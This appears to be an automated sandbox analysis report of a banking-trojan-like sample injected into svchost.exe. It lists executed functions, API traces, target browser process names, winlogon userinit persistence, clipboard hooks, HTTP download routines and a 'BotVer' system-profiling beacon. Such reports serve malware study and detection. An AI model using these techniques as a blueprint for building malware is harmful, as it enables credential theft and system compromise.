81876->81872 81877 2c83c67 GetProcessHeap HeapFree 81876->81877 81877->81872 81878->81873 81881 2c83c93 CloseHandle 81878->81881 81884 2c83ca8 81879->81884 81880->81870 81882 2c83c46 GetProcessHeap HeapFree 81880->81882 81881->81873 81882->81870 81883 2c83d29 81883->81865 81884->81883 81897 2c764d0 81884->81897 81886 2c83d0d GetProcessHeap HeapValidate 81886->81883 81887 2c83d1d GetProcessHeap RtlFreeHeap 81886->81887 81887->81883 81889 2c76224 81888->81889 81890 2c76158 RegQueryValueExA 81888->81890 81891 2c76232 81889->81891 81892 2c7622b RegCloseKey 81889->81892 81890->81889 81893 2c7617f 81890->81893 81891->81366 81892->81891 81893->81889 81894 2c761e3 GetProcessHeap HeapAlloc 81893->81894 81894->81889 81895 2c761fd memset 81894->81895 81895->81889 81896 2c76211 lstrcpynA 81895->81896 81896->81889 81898 2c76562 81897->81898 81899 2c764e2 81897->81899 81898->81886 81899->81898 81900 2c764eb CreateFileA 81899->81900 81901 2c7650a WriteFile 81900->81901 81902 2c76559 81900->81902 81903 2c76522 SetEndOfFile 81901->81903 81904 2c7652d 81901->81904 81902->81886 81903->81904 81904->81902 81905 2c7653d GetHandleInformation 81904->81905 81905->81902 81906 2c7654c 81905->81906 81906->81902 81907 2c76552 CloseHandle 81906->81907 81907->81902 81909 2c839a2 81908->81909 81922 2c8366b 81908->81922 81909->81854 81910 2c836d1 InternetOpenA 81911 2c839ad 81910->81911 81912 2c836f4 InternetConnectA 81910->81912 81911->81854 81913 2c8398f InternetCloseHandle 81912->81913 81914 2c83712 HttpOpenRequestA 81912->81914 81913->81854 81916 2c83744 81914->81916 81917 2c83985 InternetCloseHandle 81914->81917 81918 2c83764 HttpAddRequestHeadersA 81916->81918 81919 2c83755 HttpAddRequestHeadersA 81916->81919 81917->81913 81920 2c837a8 HttpSendRequestA 81918->81920 81921 2c83778 _snprintf HttpAddRequestHeadersA 81918->81921 81919->81918 81923 2c8397b InternetCloseHandle 81920->81923 81924 2c837c1 HttpQueryInfoA 81920->81924 81921->81920 81922->81909 81922->81910 81923->81917 81924->81923 81925 2c837e1 81924->81925 81925->81923 81926 2c837ee CreateFileA 81925->81926 81926->81923 81927 2c8381a 81926->81927 81928 2c83820 GetProcessHeap HeapAlloc 81927->81928 81929 2c8383a memset InternetReadFile 81928->81929 81930 2c838c3 81928->81930 81931 2c83869 81929->81931 81932 2c838a7 GetProcessHeap HeapValidate 81929->81932 81933 2c838ea 81930->81933 81934 2c838c7 GetHandleInformation 81930->81934 81931->81932 81937 2c83870 WriteFile GetProcessHeap HeapValidate 81931->81937 81932->81930 81938 2c838b7 GetProcessHeap HeapFree 81932->81938 81936 2c76570 13 API calls 81933->81936 81934->81933 81935 2c838dd 81934->81935 81935->81933 81939 2c838e3 CloseHandle 81935->81939 81942 2c838fa 81936->81942 81937->81928 81940 2c83896 GetProcessHeap HeapFree 81937->81940 81938->81930 81939->81933 81940->81928 81941 2c83978 81941->81923 81942->81941 81943 2c764d0 5 API calls 81942->81943 81944 2c8395c GetProcessHeap HeapValidate 81943->81944 81944->81941 81945 2c8396c GetProcessHeap HeapFree 81944->81945 81945->81941 81946 2c76a30 NtQuerySystemInformation 81947 2c76a5f GetCurrentProcessId 81946->81947 81952 2c76b39 81946->81952 81955 2c92e00 OpenProcess 81947->81955 81950 2c76a6e GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 81951 2c76a98 lstrcmpiA 81950->81951 81954 2c76ab2 81950->81954 81951->81952 81951->81954 81953 2c76ad0 memset _snprintf OpenMutexA 81953->81954 81954->81952 81954->81953 81956 2c76a6a 81955->81956 81957 2c92e25 OpenProcessToken 81955->81957 81956->81950 81956->81954 81958 2c92e3a GetTokenInformation 81957->81958 81959 2c92ed2 GetHandleInformation 81957->81959 81961 2c92e54 CharUpperA 81958->81961 81962 2c92e82 81958->81962 81959->81956 81960 2c92ee8 81959->81960 81960->81956 81964 2c92eee CloseHandle 81960->81964 81965 2c92e70 81961->81965 81962->81959 81963 2c92eb6 GetHandleInformation 81962->81963 81963->81959 81967 2c92ec5 81963->81967 81964->81956 81965->81962 81966 2c92e84 CharUpperA 81965->81966 81966->81962 81967->81959 81968 2c92ecb CloseHandle 81967->81968 81968->81959 81969 29a1360 82011 29a11d0 81969->82011 81971 29a136f GetPEB 81972 29a1090 GetPEB 81971->81972 81973 29a1394 81972->81973 81974 29a1000 GetPEB 81973->81974 81975 29a13a0 81974->81975 81976 29a1090 GetPEB 81975->81976 81977 29a13a6 81976->81977 81978 29a1619 81977->81978 81979 29a13bc GetPEB 81977->81979 81980 29a1000 GetPEB 81978->81980 81981 29a1090 GetPEB 81979->81981 81982 29a1625 81980->81982 81985 29a13d8 81981->81985 81983 29a1090 GetPEB 81982->81983 81984 29a162b 81983->81984 81985->81978 81986 29a1000 GetPEB 81985->81986 81987 29a141b 81986->81987 81988 29a1090 GetPEB 81987->81988 81989 29a1421 81988->81989 81990 29a1000 GetPEB 81989->81990 81991 29a1441 81990->81991 81992 29a1090 GetPEB 81991->81992 81993 29a1447 VirtualAlloc 81992->81993 81993->81978 81999 29a1460 81993->81999 81994 29a158c 81995 29a1000 GetPEB 81994->81995 81996 29a15bd 81995->81996 81997 29a1090 GetPEB 81996->81997 81998 29a15c3 81997->81998 82000 29a12c0 GetPEB 81998->82000 81999->81994 82002 29a1090 GetPEB 81999->82002 82005 29a1000 GetPEB 81999->82005 82009 29a1090 GetPEB 81999->82009 82001 29a15de 82000->82001 82001->81978 82004 29a1000 GetPEB 82001->82004 82003 29a150f LoadLibraryExA 82002->82003 82003->81999 82006 29a1608 82004->82006 82005->81999 82007 29a1090 GetPEB 82006->82007 82008 29a160e 82007->82008 82010 2c86290 2063 API calls 82008->82010 82009->81999 82010->81978 82013 29a11d5 82011->82013

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 02C85890 Relevance: 273.9, APIs: 123, Strings: 33, Instructions: 862threadmemorylibraryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C73310: IsUserAnAdmin.SHELL32 ref: 02C73335
                                                                                                                                                                                                              • Part of subcall function 02C73310: GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C73354
                                                                                                                                                                                                              • Part of subcall function 02C73310: PathAddBackslashA.SHLWAPI(?), ref: 02C73361
                                                                                                                                                                                                              • Part of subcall function 02C73310: GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02C7337E
                                                                                                                                                                                                              • Part of subcall function 02C73310: _snprintf.MSVCRT ref: 02C73399
                                                                                                                                                                                                              • Part of subcall function 02C73310: RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02C733B7
                                                                                                                                                                                                              • Part of subcall function 02C73310: RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02C7340C
                                                                                                                                                                                                              • Part of subcall function 02C73310: RegCloseKey.ADVAPI32(00000000), ref: 02C7341A
                                                                                                                                                                                                              • Part of subcall function 02C93E40: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02C93E6F
                                                                                                                                                                                                              • Part of subcall function 02C93E40: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02C93EA8
                                                                                                                                                                                                              • Part of subcall function 02C93E40: _snprintf.MSVCRT ref: 02C93F13
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\user\AppData\Roaming\), ref: 02C858B0
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\), ref: 02C858BB
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C858CF
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02C858EB
                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 02C858F5
                                                                                                                                                                                                            • GetCommandLineW.KERNEL32 ref: 02C8592D
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(02CBD888), ref: 02C8595C
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C85979
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C82140,00000000,00000000,00000000), ref: 02C859B7
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C859CF
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C859E0
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C868B0,00000000,00000000,00000000), ref: 02C85A0F
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C85A27
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C85A38
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00016B60,00000000,00000000,00000000), ref: 02C85A4D
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,92F35F00a), ref: 02C85A61
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(02CBD8A0), ref: 02C85A70
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C864A0,00000000,00000000,00000000), ref: 02C85A84
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C85A94
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C85AA5
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C85590,00000000,00000000,00000000), ref: 02C85ABA
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C85ACA
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C85ADB
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C842C0,00000000,00000000,00000000), ref: 02C85B05
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C85B19
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C85B2A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85B39
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C85B3C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85B49
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C85B4C
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C85B70
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C85B82
                                                                                                                                                                                                              • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76271
                                                                                                                                                                                                              • Part of subcall function 02C76240: memset.MSVCRT ref: 02C7628F
                                                                                                                                                                                                              • Part of subcall function 02C76240: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C762AB
                                                                                                                                                                                                              • Part of subcall function 02C76240: RegQueryValueExA.KERNEL32(?,92F358B2a,00000000,00000001,?,00000104), ref: 02C762D2
                                                                                                                                                                                                              • Part of subcall function 02C76240: GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02C7634A
                                                                                                                                                                                                              • Part of subcall function 02C76240: HeapAlloc.KERNEL32(00000000), ref: 02C76351
                                                                                                                                                                                                              • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76365
                                                                                                                                                                                                              • Part of subcall function 02C76240: lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02C7637E
                                                                                                                                                                                                              • Part of subcall function 02C76240: RegCloseKey.ADVAPI32(?), ref: 02C7638C
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 02C85B8E
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C85B9D
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\svchost.exe), ref: 02C85BB9
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\iexplore.exe), ref: 02C85BE0
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\java.exe), ref: 02C85BF6
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\javaw.exe), ref: 02C85C0C
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\javaws.exe), ref: 02C85C22
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\opera.exe), ref: 02C85C38
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\firefox.exe), ref: 02C85C4E
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\maxthon.exe), ref: 02C85C64
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\avant.exe), ref: 02C85C7A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\mnp.exe), ref: 02C85C90
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\safari.exe), ref: 02C85CA6
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\netscape.exe), ref: 02C85CBC
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\tbb-firefox.exe), ref: 02C85CD2
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02C85CE8
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02C85CFE
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8A300,00000000,00000000,00000000), ref: 02C85D2C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85D46
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C85D53
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8D990,00000000,00000000,00000000), ref: 02C85D68
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85D7C
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C85D89
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8EF40,00000000,00000000,00000000), ref: 02C85D9E
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85DB2
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C85DBF
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8F770,00000000,00000000,00000000), ref: 02C85DD4
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85DE8
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C85DF5
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8E0B0,00000000,00000000,00000000), ref: 02C85E0A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85E1E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C85E2B
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8B580,00000000,00000000,00000000), ref: 02C85E40
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85E54
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C85E61
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8B620,00000000,00000000,00000000), ref: 02C85E76
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85E8A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C85E97
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8FEE0,00000000,00000000,00000000), ref: 02C85EAC
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85EC0
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C85ECD
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C90AF0,00000000,00000000,00000000), ref: 02C85EE2
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85EF6
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C85F03
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C917E0,00000000,00000000,00000000), ref: 02C85F18
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85F2C
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C85F39
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C918D0,00000000,00000000,00000000), ref: 02C85F4E
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85F62
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C85F6F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8E890,00000000,00000000,00000000), ref: 02C85F84
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85F98
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C85FA5
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C91AB0,00000000,00000000,00000000), ref: 02C85FBA
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85FCE
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C85FDB
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C92A30,00000000,00000000,00000000), ref: 02C85FF0
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C86004
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C86011
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C92D50,00000000,00000000,00000000), ref: 02C86026
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8603A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C86047
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C902E0,00000000,00000000,00000000), ref: 02C8605C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C86070
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8607D
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C77110,00000000,00000000,00000000), ref: 02C86092
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C860AA
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C860BF
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\isclient.exe), ref: 02C860D6
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\ipc_full.exe), ref: 02C860EC
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\intpro.exe), ref: 02C860FE
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\cbsmain.dll), ref: 02C86110
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\clmain.exe), ref: 02C86122
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\core.exe), ref: 02C86134
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\rundll32.exe), ref: 02C86146
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\notepad.exe), ref: 02C86158
                                                                                                                                                                                                              • Part of subcall function 02C844F0: memset.MSVCRT ref: 02C84511
                                                                                                                                                                                                              • Part of subcall function 02C844F0: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7556F550,75497390,75570A60), ref: 02C84527
                                                                                                                                                                                                              • Part of subcall function 02C844F0: AddVectoredExceptionHandler.KERNEL32(00000001,02C73940), ref: 02C84534
                                                                                                                                                                                                              • Part of subcall function 02C844F0: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C8454F
                                                                                                                                                                                                              • Part of subcall function 02C844F0: CreateThread.KERNEL32(00000000,00000000,Function_00019230,00000000,00000000,00000000), ref: 02C84569
                                                                                                                                                                                                              • Part of subcall function 02C844F0: GetHandleInformation.KERNEL32(00000000,?), ref: 02C84581
                                                                                                                                                                                                              • Part of subcall function 02C844F0: CloseHandle.KERNEL32(00000000), ref: 02C84592
                                                                                                                                                                                                              • Part of subcall function 02C844F0: InitializeCriticalSection.KERNEL32(02CBD870), ref: 02C845A3
                                                                                                                                                                                                              • Part of subcall function 02C844F0: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845B9
                                                                                                                                                                                                              • Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02C845CB
                                                                                                                                                                                                              • Part of subcall function 02C844F0: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845EA
                                                                                                                                                                                                              • Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02C845F8
                                                                                                                                                                                                              • Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02C84614
                                                                                                                                                                                                              • Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02C84630
                                                                                                                                                                                                              • Part of subcall function 02C76FB0: GetCurrentProcessId.KERNEL32 ref: 02C76FB9
                                                                                                                                                                                                              • Part of subcall function 02C76FB0: GetCurrentThreadId.KERNEL32 ref: 02C76FC8
                                                                                                                                                                                                              • Part of subcall function 02C76FB0: GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C76FE1
                                                                                                                                                                                                              • Part of subcall function 02C76FB0: GetUserObjectInformationA.USER32(00000000), ref: 02C76FE8
                                                                                                                                                                                                              • Part of subcall function 02C76FB0: lstrcmpiA.KERNEL32(?,92f35800a), ref: 02C76FFE
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\opera.exe,00000000), ref: 02C86183
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,RtlFreeHeap,02C84010,02CC7D38), ref: 02C8619D
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02C861A0
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02C861B4
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 02C861D1
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C861E0
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,00000002,?,00000100,00000000), ref: 02C861F9
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(00000000), ref: 02C86200
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,92f35800a), ref: 02C86216
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C7ACD0,00000000,00000000,00000000), ref: 02C8622A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8623E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8624B
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C77020,00000000,00000000,00000000), ref: 02C86260
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C86274
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C86281
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Thread$CreateInformation$Close$AddressHeapProcProcess$Current$ModuleUsermemset$CriticalInitializeMutexPathSection$AdminBackslashCommandDesktopFileLibraryLineLoadNameObjectOpenQueryValueVolume_snprintflstrcmpi$AllocDirectoryEnvironmentExceptionFolderFreeHandlerSystemValidateVariableVectoredWindowslstrcpyn
                                                                                                                                                                                                            • String ID: --no-sandbox$ --no-sandbox$92F35C4Ca$92F35F00a$92f35800a$C:\Users\user\AppData\Roaming\$IsWow64Process$RtlFreeHeap$\avant.exe$\cbsmain.dll$\chrome.exe$\clmain.exe$\core.exe$\explorer.exe$\firefox.exe$\iexplore.exe$\intpro.exe$\ipc_full.exe$\isclient.exe$\java.exe$\javaw.exe$\javaws.exe$\maxthon.exe$\mnp.exe$\netscape.exe$\notepad.exe$\opera.exe$\rundll32.exe$\safari.exe$\svchost.exe$\tbb-firefox.exe$kernel32.dll$ntdll.dll
                                                                                                                                                                                                            • API String ID: 558288730-3440130981
                                                                                                                                                                                                            • Opcode ID: 7632c9f1294aeafb7bec174db2dbf705998d76639d33d898e8d72797694d4a77
                                                                                                                                                                                                            • Instruction ID: 853c4c066e2a5854523634396e0bfcaf0d9341f37bcf380c5529ae26b42d1a77
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7632c9f1294aeafb7bec174db2dbf705998d76639d33d898e8d72797694d4a77
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F52E971E81355B6FB21E7A08D46FAE77AC9F84B48F618594F901B70C1DBF0DB048AA4
                                                                                                                                                                                                            Function 02C74920 Relevance: 135.3, APIs: 56, Strings: 21, Instructions: 596filetimeCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 196 2c74920-2c74a59 CreateFileA 197 2c74fe4-2c74fe9 196->197 198 2c74a5f-2c74aca WriteFile * 3 GetModuleFileNameA WriteFile 196->198 199 2c74ad0-2c74ad5 198->199 199->199 200 2c74ad7-2c74b2a WriteFile * 2 GetUserNameA WriteFile 199->200 201 2c74b30-2c74b35 200->201 201->201 202 2c74b37-2c74b8d WriteFile * 2 GetEnvironmentVariableA WriteFile 201->202 203 2c74b90-2c74b95 202->203 203->203 204 2c74b97-2c74bdf WriteFile * 2 GetSystemDefaultLangID memset 203->204 205 2c74be1-2c74beb 204->205 206 2c74bf5-2c74c0b 205->206 207 2c74bed-2c74bf1 205->207 208 2c74c11-2c74c1a 206->208 207->205 209 2c74bf3 207->209 210 2c74c20-2c74c25 208->210 209->208 210->210 211 2c74c27-2c74c29 210->211 212 2c74c35-2c74c4d WriteFile 211->212 213 2c74c2b 211->213 214 2c74c50-2c74c55 212->214 213->212 214->214 215 2c74c57-2c74cd2 WriteFile * 2 GetDC GetDeviceCaps GetSystemMetrics * 2 _snprintf WriteFile 214->215 216 2c74cd5-2c74cda 215->216 216->216 217 2c74cdc-2c74d3c WriteFile * 2 GetDateFormatA WriteFile 216->217 218 2c74d40-2c74d45 217->218 218->218 219 2c74d47-2c74da4 WriteFile * 2 GetTimeFormatA WriteFile 218->219 220 2c74da7-2c74dac 219->220 220->220 221 2c74dae-2c74e5e WriteFile * 2 GetTimeZoneInformation _snprintf WriteFile 220->221 222 2c74e61-2c74e66 221->222 222->222 223 2c74e68-2c74ea9 WriteFile * 3 call 2c74070 222->223 226 2c74eb0-2c74eb5 223->226 226->226 227 2c74eb7-2c74f0d call 2c74070 WriteFile * 2 GetSystemWindowsDirectoryA WriteFile 226->227 230 2c74f10-2c74f15 227->230 230->230 231 2c74f17-2c74f5d WriteFile * 3 IsUserAnAdmin 230->231 232 2c74f64 231->232 233 2c74f5f 231->233 234 2c74f67-2c74f6c 232->234 233->232 234->234 235 2c74f6e-2c74f80 IsUserAnAdmin 234->235 236 2c74f87-2c74fbb WriteFile * 2 call 2c747e0 call 2c740f0 call 2c743e0 call 2c74630 235->236 237 2c74f82 235->237 245 2c74fc0-2c74fc6 236->245 237->236 245->197 246 2c74fc8-2c74fd5 GetHandleInformation 245->246 246->197 247 2c74fd7-2c74fdb 246->247 247->197 248 2c74fdd-2c74fde CloseHandle 247->248 248->197
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,?,75495CE0), ref: 02C74A4E
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{BotVer: ,00000009,02C73EFD,00000000,02CCB0C4), ref: 02C74A76
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,4.0.1,00000005,02C73EFD,00000000), ref: 02C74A88
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74A9A
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C74AA9
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Process: ,0000000A,02C73EFD,00000000), ref: 02C74ABF
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74AEA
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74AFC
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(?,00000104), ref: 02C74B09
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Username: ,0000000B,02C73EFD,00000000), ref: 02C74B1F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74B4A
